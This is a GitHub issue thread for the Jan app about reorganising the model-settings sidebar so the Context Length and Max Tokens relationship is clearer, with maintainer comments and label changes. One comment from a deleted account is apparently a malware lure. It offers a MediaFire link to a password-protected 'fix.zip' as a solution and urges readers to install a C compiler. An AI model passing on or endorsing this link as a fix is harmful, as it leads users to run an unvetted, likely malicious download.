Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

enhancement: [UX enhancement] Improve sidebar settings hierarchy and better UX handling of Context Length/Max Tokens relationship #3738

Open
imtuyethan opened this issue Sep 29, 2024 · 3 comments
Assignees
Labels
category: model settings Inference params, presets, templates category: threads & chat Threads & chat UI UX issues needs designs Needs designs type: enhancement Improves a current feature

Comments

@imtuyethan
Copy link
Contributor

imtuyethan commented Sep 29, 2024

Problem Statement

Currently, changing the Context Length automatically adjusts the Max Tokens value, which can lead to unexpected behavior and confusion for users. The relationship between these two settings is not immediately clear, and users may unintentionally reduce their Max Tokens without realizing it. This can result in shortened and truncated replies, potentially being perceived as a bug or poor software design.

  • Settings organization lacks clear hierarchy
  • Some related settings are separated
  • Technical settings mixed with basic ones, results in normal users breaking their model settings

Proposed Changes

  • Groups related settings together
  • Moves from basic to advanced options
  • Makes Context Length and Max Tokens relationship clearer by placing them next to each other
  • Separates technical settings from common ones
1. Model Selection
   - Model dropdown

2. Model Capacity
   - Context Length
   - Max Tokens
   - Number of GPU layers (ngl)

3. Response Control 
   - Temperature
   - Top P
   - Stream
   - Frequency Penalty
   - Presence Penalty
   - Stop

4. Advanced Settings
   - Prompt template
   

Figma link: https://www.figma.com/design/DYfpMhf8qiSReKvYooBgDV/Jan-App-(3rd-version)?node-id=8930-46312&t=bJX9XIK7iffILBnO-4

Screenshot 2024-11-05 at 9 23 01 AM

By rearrange the settings like this, we could improve:

  • Users can directly see the changes of Max Token's maximum number when changing Context Length settings
  • Better user understanding of settings
  • Reduce confusion about Context Length/Max Tokens relationship
  • More intuitive settings discovery

Notes:

  • Keep existing functionality
  • Only reorganize UI layout
  • No changes to underlying settings values
@imtuyethan imtuyethan added the type: enhancement Improves a current feature label Sep 29, 2024
@github-project-automation github-project-automation bot moved this to Triage in Menlo Sep 29, 2024
@ghost
Copy link

ghost commented Sep 29, 2024

I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

@freelerobot freelerobot added the category: threads & chat Threads & chat UI UX issues label Oct 14, 2024
@freelerobot
Copy link
Contributor

freelerobot commented Oct 14, 2024

Related #3796

Let's keep it simple. The current feature idea is too complex

@freelerobot freelerobot added the category: model settings Inference params, presets, templates label Oct 15, 2024
@imtuyethan imtuyethan changed the title idea: Improve Context Length and Max Tokens UX idea: [UX enhancement] Improve Context Length and Max Tokens UX Oct 17, 2024
@imtuyethan
Copy link
Contributor Author

Related #3796

Let's keep it simple. The current feature idea is too complex

I think this is not related to #3796.

This is purely around how changing context length affect max token but the users are not well informed about the changes, the UX could be improved. Let's move this to Planning sprint 25?

@imtuyethan imtuyethan changed the title idea: [UX enhancement] Improve Context Length and Max Tokens UX idea: [UX enhancement] Improve Context Length and Max Tokens Settings UX Oct 18, 2024
@imtuyethan imtuyethan self-assigned this Nov 4, 2024
@imtuyethan imtuyethan moved this from Investigating to Scheduled in Menlo Nov 4, 2024
@imtuyethan imtuyethan added the needs designs Needs designs label Nov 4, 2024
@imtuyethan imtuyethan changed the title idea: [UX enhancement] Improve Context Length and Max Tokens Settings UX idea: [UX enhancement] Improve sidebar settings hierarchy and better UX handling of Context Length/Max Tokens relationship Nov 5, 2024
@imtuyethan imtuyethan moved this from Scheduled to Icebox in Menlo Jan 20, 2025
@imtuyethan imtuyethan changed the title idea: [UX enhancement] Improve sidebar settings hierarchy and better UX handling of Context Length/Max Tokens relationship enhancement: [UX enhancement] Improve sidebar settings hierarchy and better UX handling of Context Length/Max Tokens relationship Jan 20, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
category: model settings Inference params, presets, templates category: threads & chat Threads & chat UI UX issues needs designs Needs designs type: enhancement Improves a current feature
Projects
Status: Icebox
Development

No branches or pull requests

2 participants